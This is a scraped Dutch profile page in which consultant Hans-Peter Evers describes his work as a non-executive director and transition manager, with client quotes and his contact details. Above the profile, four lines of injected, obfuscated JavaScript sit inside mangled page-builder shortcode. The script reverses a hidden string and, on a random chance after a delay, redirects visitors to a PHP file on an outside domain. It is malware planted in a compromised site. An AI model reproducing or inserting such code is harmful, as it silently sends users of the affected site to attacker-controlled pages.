) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat” global_colors_info=”{}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat” use_border_color=”off” global_colors_info=”{}”]

Over Hans Peter Evers

 

Ervaren Non-Executive Director, bestuurder, (digitaal) ondernemer, transition manager

Groeipartner die rust, structuur en overzicht brengt in hectische tijden

 

Mijn omgeving ziet mij als een bruggenbouwer. Als ervaren bestuurder en (digitaal) ondernemer breng ik, met aandacht voor alle stakeholders, belangen en mensen bij elkaar voor gemeenschappelijk succes.

Ik weet zelf hoe het is om als directeur/eigenaar van een bedrijf je weg te zoeken in de hectiek die snelle groei met zich meebrengt. Al sinds 1990 ben ik betrokken geweest bij de lancering van diverse innovatieve bedrijfsconcepten en start-ups. Zo mocht ik aan de wieg staan van de eerste concepten op het gebied van interactieve TV. Daarnaast heb ik ook mijn eigen ‘web-based’ (SAAS) meetbedrijf opgezet en succesvol uitgebouwd. En in die hectiek heb ik ook af en toe mijn vingers gebrand.

Het beheerst doorvoeren van veranderingen (transities) heeft mij altijd geboeid en eigenlijk heb ik mijn hele werkzame leven niets anders gedaan. Met als centrale vraag: “Hoe krijg je mensen in beweging?” In de loop der jaren heb ik vele bedrijven uit het slop getrokken of meegeholpen aan een stevige bedrijfsgroei. Er zijn weinig zaken waar ik niet mee te maken heb gehad. Als transitiemanager heb ik zowel familiebedrijven, private equity bedrijven als beursgenoteerde concerns mogen helpen; met turn-arounds, fusies, overnames, internationale groei, alsook aan- en verkopen van bedrijfsonderdelen.

Kort samengevat beschik ik naast mijn digitale trackrecord over een stevige dosis ervaring in business management, sales management en marketing in business-to-business markten. Op het vlak van talent assessment en cultuurverandering heb ik ook de nodige know-how opgebouwd. Mijn kracht ligt het verbinden van (ICT) technologie, business en mensen. Mijn achtergrond in de ICT geeft daarbij een stevige basis voor het sturen van digitale transformatie programma’s.

Vanuit tien jaar internationale sales ervaring heb ik daarnaast een goed gevoel ontwikkeld voor interculturele verschillen en hoe hiermee effectief om te gaan. Niet alleen heb ik zelf een tijd een Frans bedrijfsonderdeel geleid, voor diverse ondernemingen was ik binnen en buiten Europa en de VS actief op het vlak van sales & marketingmanagement, het opzetten van een internationaal netwerk, het acquireren van bedrijven en business development.

Vaak zegt mijn omgeving dat ik in staat ben om mensen die elkaars tegenpolen zijn met elkaar te verbinden en ieders competenties optimaal in te zetten. Ik geloof in de kracht van de talenten van de mensen en dat we deze keihard nodig hebben voor het bedrijf. Door de context en het perspectief helder te maken – welke rol spelen ze in het geheel? – weet ik hen te motiveren.

Ik ben opgeleid als biofysicus en woon in Zeist, Nederland. Nederlands is mijn moedertaal en daarnaast spreek ik Engels, Frans en Duits goed genoeg om zaken te kunnen doen.

 

Uitspraken van klanten:
“Hans-Peter ik wil jou bedanken voor je geduld en wijsheid om het splitsingsproces te begeleiden.” (Directeur/eigenaar)
“Hans-Peter bracht mijn bedrijf met de bijbehorende joint ventures op orde en leidde vervolgens het proces dat resulteerde in de succesvolle verkoop van de onderneming” (Directeur/eigenaar)
“Hans-Peter betrekt iedereen en houdt ze bij de les. Hij maakt de grote lijn duidelijk” (ICT applicatie manager)
“Hans-Peter weet anderen te overtuigen, mensen te betrekken bij het proces en op directieniveau de juiste vragen te stellen” (Procesmanager/controller)
“Hans-Peter heeft een interessante combinatie van linker en rechter hersenhelft” (John Kao, auteur, strategic advisor, jazz pianist)

 

Ik maak graag een afspraak om hier verder over te praten.

Hans-Peter Evers
E hanspeterevers@tanera.com
M +31 622 791 109

nl_NLNL